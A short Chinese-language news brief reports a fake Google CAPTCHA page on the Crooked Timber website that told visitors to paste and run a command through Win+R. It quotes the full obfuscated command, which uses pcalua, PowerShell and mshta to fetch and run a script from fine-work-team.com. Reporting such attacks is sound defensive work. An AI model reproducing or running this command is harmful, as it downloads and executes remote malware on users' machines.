头版Folia Daily Briefing
← 返回头版
科技互联网

Crooked Timber网站出现伪装验证码的恶意脚本诱导

访问Crooked Timber网站的用户遭遇了一次网络钓鱼攻击[1]。该恶意页面伪装成Google验证码的形式,试图诱导用户执行含有PowerShell命令的脚本[1]。

该恶意页面声称需要用户按下Win+R和Ctrl+V组合键来运行命令以验证是否为真人[1]。其中的PowerShell命令旨在从远程URL(fine-work-team.com)下载并执行恶意脚本,具体命令为"pcalua -a "PowerShell" -c "saps cmd '/v/c m^s^h^t^a h^t^t^p^s^:^/^/fine-work-team.com/6272' -Wi Hi""[1]。用户及时识别了这一威胁并向大语言模型咨询,后者明确建议不要运行该命令[1]。


网络安全恶意软件钓鱼攻击Crooked TimberPowerShell脚本